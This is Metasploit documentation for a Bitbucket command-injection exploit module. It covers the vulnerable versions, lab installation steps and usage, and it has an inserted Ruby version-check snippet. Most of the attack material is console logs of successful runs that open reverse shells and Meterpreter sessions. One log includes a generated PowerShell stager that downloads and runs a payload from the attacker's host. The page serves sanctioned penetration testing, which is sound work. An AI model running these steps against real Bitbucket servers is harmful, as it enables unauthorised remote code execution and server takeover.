metasploit-gs/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
2023-03-15 13:24:33 -05:00

## Vulnerable Application

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the atlbitbucket user by injecting the GIT_EXTERNAL_DIFF environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the GIT_EXTERNAL_DIFF environment variable will be run once the Bitbucket application is coerced into generating a diff.

This module requires at least admin credentials, because only admins and above have the option to change their user name.

The advisory lists the following versions as vulnerable:

* 7.0 to 7.5 (all versions)
* 7.6.0 to 7.6.18
* 7.7 to 7.16 (all versions)
* 7.17.0 to 7.17.11
* 7.18 to 7.20 (all versions)
* 7.21.0 to 7.21.5

If mesh.enabled=false is set in bitbucket.properties:

* 8.0.0 to 8.0.4
* 8.1.0 to 8.1.4
* 8.2.0 to 8.2.3
* 8.3.0 to 8.3.2
* 8.4.0 to 8.4.1
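As an added example that is not part of the module or its documentation, the following Ruby encodes the version ranges listed above (including the mesh.enabled condition for the 8.x lines) as a check an administrator can run against a reported Bitbucket version; the version string and the bitbucket.properties contents are assumed inputs supplied by the caller.

```ruby
# Added example, not code from the Metasploit module or its docs: encodes the
# advisory's vulnerable-version list from this page as a defender-side check.
# Version string and mesh.enabled value are assumed to be supplied by the caller.

# Inclusive ranges. A bound written as major.minor (no patch level)
# covers every patch release of that line ("all versions").
VULNERABLE_RANGES = [
  ['7.0', '7.5'], ['7.6.0', '7.6.18'], ['7.7', '7.16'],
  ['7.17.0', '7.17.11'], ['7.18', '7.20'], ['7.21.0', '7.21.5']
].freeze

# 8.x lines are vulnerable only when mesh.enabled=false is set.
MESH_DISABLED_RANGES = [
  ['8.0.0', '8.0.4'], ['8.1.0', '8.1.4'], ['8.2.0', '8.2.3'],
  ['8.3.0', '8.3.2'], ['8.4.0', '8.4.1']
].freeze

# "7.6.17" -> [7, 6, 17]; rejects anything that is not dotted integers.
def parse_version(str)
  parts = str.strip.split('.').map { |p| Integer(p, 10) }
  raise ArgumentError, "bad version #{str.inspect}" if parts.size < 2
  parts
end

# Compare only as many components as the bound itself specifies.
def in_range?(version, low, high)
  v = parse_version(version)
  lo = parse_version(low)
  hi = parse_version(high)
  (lo <=> v[0, lo.size]) <= 0 && (v[0, hi.size] <=> hi) <= 0
end

# Read mesh.enabled from bitbucket.properties text; nil when not set.
def mesh_enabled_from_properties(text)
  line = text.each_line.map(&:strip).find { |l| l.start_with?('mesh.enabled=') }
  line && line.split('=', 2)[1].strip.downcase == 'true'
end

# :vulnerable, :not_vulnerable, or :vulnerable_if_mesh_disabled when the
# version is an affected 8.x line and mesh.enabled is unknown (nil).
def bitbucket_status(version, mesh_enabled: nil)
  return :vulnerable if VULNERABLE_RANGES.any? { |lo, hi| in_range?(version, lo, hi) }
  return :not_vulnerable unless MESH_DISABLED_RANGES.any? { |lo, hi| in_range?(version, lo, hi) }
  case mesh_enabled
  when true  then :not_vulnerable
  when false then :vulnerable
  else :vulnerable_if_mesh_disabled
  end
end
```

Feeding the properties file through `mesh_enabled_from_properties` and the result into `bitbucket_status` reproduces the module's own caveat that 8.x is affected only with mesh disabled.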

## Installation Instructions

1. Install Git on the target machine
    * For Linux
        * `sudo apt install -y git`
    * For Windows
        * Download an installer
        * Selecting all defaults should be fine
2. Download a vulnerable version of Bitbucket. For example, version 7.18.1 can be found here for Linux and here for Windows
3. For Linux, make sure the resulting bin file is executable and run it. Just double click on the installer file if using Windows
    * `chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin`
4. An installation wizard will pop up. Make sure Install a new instance is checked, then click Next
5. Check Install a Server instance and click Next
6. If the default destination directory looks good, click Next
7. Click Next if the default Bitbucket data directory looks fine
8. Make sure the Use default HTTP port (7990) selection is checked and click Next
9. Make sure the Install Bitbucket as a service box is checked and click Next
10. Click Install if everything looks correct on the summary screen
11. Once the installation completes, make sure the Would you like to launch Bitbucket option is selected and click Next
12. Ensure Launch Bitbucket <version> in browser is selected and click Finish
13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the I need an evaluation license option
14. If you already have an account, select I have an account; otherwise, create a new account
15. 'up and running' should be selected on the next page, so click Generate License
16. Confirm that the prompt gives you the correct server, then click Yes
17. The license should be entered in the box, so select Next
18. Finally, set up an administrator account

Note: If an error occurs on the last step, just open a browser and navigate to the setup page at 127.0.0.1:7990. If installing an 8.* version of Bitbucket, you will need to create a bitbucket.properties file at /var/atlassian/application-data/bitbucket/shared. Once created, add the line mesh.enabled=false, save the file, and restart Bitbucket.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
4. Do: `set USERNAME <username>`
5. Do: `set PASSWORD <pass>`
6. Do: `set RHOST <target_ip>`
7. Do: `set LHOST <listen_ip>`
8. Do: `run`
9. You should get a shell.

## Options

**USERNAME**

Username to authenticate with; the account must have at least admin privileges.

**PASSWORD**

Password to authenticate with

## Scenarios

### Ubuntu 22.04 x64 - Bitbucket v7.6.17, CMD Target

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username test
username => test
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password password
password => password
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'fjNMKiB'
[+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
[*] Sending payload
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:41118) at 2023-03-13 14:04:00 -0500
[*] Changing user name back to 'test'
[+] Repository has been deleted
[+] Project has been deleted

uname -a
Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
```

### Ubuntu 22.04 x64 - Bitbucket v7.6.17, Linux Dropper

```
msf6 exploit(multi/http/bitbucket_env_var_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Linux Command
=>  1   Linux Dropper
    2   Windows Dropper


msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'gmoQNc'
[+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/VtgFQ7yCgjcP
[*] Client 192.168.140.149 (Wget/1.21.2) requested /VtgFQ7yCgjcP
[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
[*] Command Stager progress -  53.04% done (61/115 bytes)
[*] Command Stager progress -  72.17% done (83/115 bytes)
[*] Sending stage (1017704 bytes) to 192.168.140.149
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:50632) at 2023-03-13 14:06:18 -0500
[*] Command Stager progress -  83.48% done (96/115 bytes)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Changing user name back to 'test'
[+] Repository has been deleted
[+] Project has been deleted

meterpreter > getuid
Server username: atlbitbucket
```

### Windows 10, x64 - Bitbucket v7.18.1, Windows Dropper

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
rhost => 192.168.140.171
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
username => admin
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
password => P@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
target => 2
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version 7.18.1 of Bitbucket
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Retrieving security token
[*] Project creation was successful
[+] Successfully created repository 'GqFji'
[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
[*] Command Stager progress -  75.19% done (97/129 bytes)
[*] Sending stage (175686 bytes) to 192.168.140.171
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
[*] Command Stager progress -  86.05% done (111/129 bytes)
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Changing user name back to 'admin'
[*] Attempting to delete repository 'GqFji'
[+] Repository has been deleted
[*] Now attempting to delete project 'eTzDRa'
[+] Project has been deleted

meterpreter > getuid
Server username: DESKTOP-5JSUGC8\atlbitbucket
meterpreter > sysinfo
Computer        : DESKTOP-5JSUGC8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
```

### Ubuntu 22.04 x64 - Bitbucket v8.4.0 with mesh.enabled set to false, Linux Dropper

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
target => 1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
username => administrator
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
password => S3cureP@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Versions 8.* are vulnerable only if the mesh setting is disabled
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'IuNYsZZPl'
[+] Commits added: 560d760fdcbcf210c2c1b6dd04663381002066e5, 53ada0136f82899451c16a00cb939225dba53336
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/qt9f0M
[*] Client 192.168.140.149 (Wget/1.21.2) requested /qt9f0M
[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
[*] Command Stager progress -  50.46% done (55/109 bytes)
[*] Command Stager progress -  70.64% done (77/109 bytes)
[*] Sending stage (1017704 bytes) to 192.168.140.149
[*] Meterpreter session 10 opened (192.168.140.1:4444 -> 192.168.140.149:43360) at 2023-03-14 19:00:00 -0500
[*] Command Stager progress -  82.57% done (90/109 bytes)
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Changing user name back to 'administrator'
[+] Repository has been deleted
[+] Project has been deleted

meterpreter > getuid
Server username: atlbitbucket
```